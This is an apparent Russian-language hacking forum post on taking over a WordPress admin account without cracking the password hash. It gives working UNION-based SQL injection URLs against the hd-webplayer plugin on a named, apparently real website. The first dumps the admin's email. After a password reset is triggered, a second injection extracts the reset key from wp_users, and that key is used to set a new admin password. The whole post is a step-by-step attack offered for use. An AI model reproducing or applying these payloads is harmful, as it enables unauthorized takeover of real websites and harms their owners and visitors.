Получаем доступ в админку Wordpress без расшифровки хэша

Информатор

Легенда
Подтвержденный
Регистрация
15.04.15
Сообщения
10,280
Реакции
826
Получаем доступ в админку Wordpress без расшифровки хэша

Приветствую. Решил написать небольшую заметку.

Как вы знаете чтобы зайти в админ-панель Wordpress, нужно расшифровать хэш администратора.

Но я понял как входить в панель без ожидания расшифровки хэша.

Покажу на примере.

У нас есть блог, где мы уже вывели данные из таблицы wp_users.

Торопится выводить пароль не стоит, выведем e-mail администратора:

http://www.abbdi.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3+union+select+1,2,3,group_concat(user_login,0x3a,user_emai),5,6,7,8,9,10,11+from+wp_users--
И результат запроса:
admin:[email protected]
/* */

Так. Теперь идем на страницу авторизации wp-login.php, и переходим на страницу восстановления пароля (В нашем случае Passwort vergessen).

Вводим e-mail администратора который мы получили выше, и отправляем письмо.

Пол дела мы сделали. Особенность Wordpress такова, что код подтверждения записывается в БД.

Делаем такой запрос:

http://www.abbdi.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3+union+select+1,2,3,group_concat(user_login,0x3a,user_activation_key),5,6,7,8,9,10,11+from+wp_users--
И в результате мы получаем активационный код:
P6rd7g1bPW28zgbPCRtZ
Теперь идем на страницу сброса пароля (При этом заполнив параметры):
www.abbdi.com/wp-login.php?action=rp&key=P6rd7g1bPW28zgbPCRtZ&login=admin
И мы видим что нам предлагают ввести новый пароль, вводим, и меняем.

Далее привычная авторизация.

Ну вот и все. Есть некоторое примечание, этот способ может не работать на тех блогах, где отключен mail().
 
Сверху Снизу